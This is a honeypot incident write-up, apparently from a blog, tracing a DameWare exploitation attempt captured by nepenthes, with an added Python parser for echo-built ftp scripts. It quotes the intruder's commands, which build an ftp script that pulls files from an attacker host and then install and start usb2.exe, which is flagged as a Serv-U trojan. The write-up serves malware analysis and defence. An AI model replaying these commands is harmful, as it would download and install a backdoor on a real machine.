Let's assume somebody connected to a box running nepenthes and tried to exploit the DameWare vulnerability with a known shellcode:
Socket TCP (bind) 0.0.0.0:0 -> 0.0.0.0:6129
DialogueFactory DameWare Dialogue Factory creates DWDialogues could Accept a Connection
Accepted Connection Socket TCP (accept) 81.164.174.142:1092 -> xxx.xxx.xxx.xxx:6129
Detected connectback shellcode konstanzConnect, 81.164.174.142:10000
Nepenthes would then connect back to the attacker and offer a shell:
Connecting xxx.xxx.xxx.xxx -> 81.164.174.142:10000
and would receive commands to download something, but fail:
Handler ftp download handler will download ftp://Leech:NFe@69.134.194.126:1337/nofileyet
So we would have a look at the logfiles.
At first a directory was created, and the shell changed into it:
Line (38) is 'mkdir c:\windows\system32\dhcp\config
Line (28) is 'cd c:\windows\system32\dhcp
Then the old echo game started (the file is built line by line with echo and append redirection), and a file ccc.txt with the content
'open 69.134.194.126 1337
Leech
NFe
hash
bin
prompt
mget *.*
bye
'
was created.
Then the file was used as a script for the Microsoft ftp client (ftp -s:file runs the commands listed in the file):
Line (15) is 'ftp -s:ccc.txt
...
The file content is:
open 69.134.194.126 1337
Leech
NFe
hash
bin
prompt
mget *.*
bye
And here nepenthes failed to parse the script, as it does not know the 'mget' command; the handler only picked up host, port and login and fell back to a placeholder file name:
Handler ftp download handler will download ftp://Leech:NFe@69.134.194.126:1337/nofileyet
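An added example, not code from nepenthes: a small Python parser that replays the echo game from a constructed shell session (host, port and credentials are taken from the log above; the exact echo lines are assumed, since the page only shows the resulting file), then parses the ftp -s script that results and builds the download list. Unlike a parser that only knows get, it treats mget as a wildcard that needs a directory listing before any file name exists, which is exactly the case that produced the placeholder name above.

```python
import re

# Constructed sample of what the shell session looks like on the wire:
# the echo game writes the ftp script one line at a time with append
# redirects, then the Microsoft ftp client runs it with -s.  Host, port
# and credentials mirror the log; the rest is made up for the demo.
SAMPLE_SHELL_SESSION = r"""
mkdir c:\windows\system32\dhcp\config
cd c:\windows\system32\dhcp
echo open 69.134.194.126 1337>>ccc.txt
echo Leech>>ccc.txt
echo NFe>>ccc.txt
echo hash>>ccc.txt
echo bin>>ccc.txt
echo prompt>>ccc.txt
echo mget *.*>>ccc.txt
echo bye>>ccc.txt
ftp -s:ccc.txt
usb2.exe /i
net start usb2
del ccc.txt
"""

# `echo <text>>>file`  (cmd.exe needs no space before the redirect)
ECHO_APPEND = re.compile(r'^\s*echo\s+(?P<text>.*?)\s*>>\s*(?P<file>\S+)\s*$', re.IGNORECASE)
# `ftp [-n ...] -s:file`
FTP_SCRIPT = re.compile(r'^\s*ftp(?:\s+-\S+)*\s+-s:(?P<file>\S+)', re.IGNORECASE)


def reconstruct_echoed_files(session: str) -> dict:
    """Replay every `echo ...>>file` and return {file: [lines...]}."""
    files = {}
    for line in session.splitlines():
        m = ECHO_APPEND.match(line)
        if m:
            files.setdefault(m.group("file").lower(), []).append(m.group("text"))
    return files


def ftp_scripts_run(session: str) -> list:
    """Names of the script files handed to `ftp -s:` in the session."""
    names = []
    for line in session.splitlines():
        m = FTP_SCRIPT.match(line)
        if m:
            names.append(m.group("file").lower())
    return names


def parse_ftp_script(lines: list) -> dict:
    """Turn an ftp -s script into host, port, credentials and transfers.

    After `open`, the Microsoft client prompts for user and then password,
    so the next two script lines are consumed as exactly those, unless the
    script logs in explicitly with a `user` command.
    """
    spec = {"host": None, "port": 21, "user": None, "password": None, "transfers": []}
    pending_login = 0  # prompts still to be answered after `open`
    for raw in lines:
        parts = raw.strip().split()
        if not parts:
            continue
        word = parts[0].lower()
        if pending_login and word != "user":
            spec["user" if spec["user"] is None else "password"] = raw.strip()
            pending_login -= 1
            continue
        if word == "open" and len(parts) > 1:
            spec["host"] = parts[1]
            if len(parts) > 2:
                spec["port"] = int(parts[2])
            pending_login = 2
        elif word == "user" and len(parts) > 1:
            spec["user"] = parts[1]
            if len(parts) > 2:
                spec["password"] = parts[2]
            pending_login = 0
        elif word in ("get", "recv") and len(parts) > 1:
            spec["transfers"].append(("get", parts[1]))
        elif word == "mget":
            # a wildcard, not a file name: nothing to fetch yet
            spec["transfers"].extend(("mget", pat) for pat in parts[1:])
        elif word in ("bye", "quit"):
            break
    return spec


def download_plan(spec: dict) -> list:
    """What a downloader has to do: a get names a file, an mget only names
    a pattern that expands after a directory listing on the server."""
    base = f"ftp://{spec['user']}:{spec['password']}@{spec['host']}:{spec['port']}/"
    plan = []
    for kind, name in spec["transfers"]:
        if kind == "get":
            plan.append(("fetch", base + name))
        else:
            plan.append(("list-then-fetch", base, name))
    return plan


if __name__ == "__main__":
    files = reconstruct_echoed_files(SAMPLE_SHELL_SESSION)
    for script in ftp_scripts_run(SAMPLE_SHELL_SESSION):
        spec = parse_ftp_script(files.get(script, []))
        print(script, spec)
        for step in download_plan(spec):
            print("  ", step)
```

The parser deliberately keys on how the Microsoft client reads a script (two prompt answers after open) rather than on what the lines look like, so a user name that happens to be a command word is still taken as a user name; a get-only parser drops the whole mget line and is left with a login but no file, which is the "nofileyet" seen in the log.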
Then the shell session went on:
Line (12) is 'usb2.exe /i
Line (15) is 'net start usb2
Line (33) is 'copy mw.txt c:\windows\system32\
Line (33) is 'copy mc.txt c:\windows\system32\
Line (12) is 'del ccc.txt
So … let's have a look at the text files.
cat mw.txt
''~``
( o o )
+------------------.oooO--(_)--Oooo.-----------------
| |
| Hacked By LunaNluv |
| |
| ooO |
| ( )Ooo |
+----------- ---------\ (( )------------------------------
\_)) /
(_/
______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
This Server is running since %ServerDays days and %ServerHours:%ServerMins hours,
and has been accessed %loggedInAll times, %u24h in the last 24 hours.
There are now %Unow users logged in, Max allowed : %MaxUsers.
______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Free Disk Space : %DFree MB
Downloaded : %ServerKbDown Kb in %ServerFilesDown Files
Uploaded : %ServerKbUp Kb in %ServerFilesUp Files
Current Speed : %ServerKBps Kb/sec
Average Speed : %ServerAvg Kb/sec
______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Do NOT rehack
Do NOT rescan this range
Do NOT abuse the server
Do NOT pass the IP & login to some-one else
Do NOT WHINE about everything
Do ENJOY this server
______________________________________________
cat mc.txt
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Free Disk Space : %DFree MB - Current Speed : %ServerKBps Kb/sec
________________________________________________ [ Luna ]
So a last look at the file itself … (the %-variables in the two banners are the placeholders Serv-U expands in its sign-on messages, which fits what the scanner says):
md5sum usb2.exe
b3ca5006f354f97afca15e14298e2681 usb2.exe
clamscan usb2.exe
usb2.exe: Trojan.Servu.1 FOUND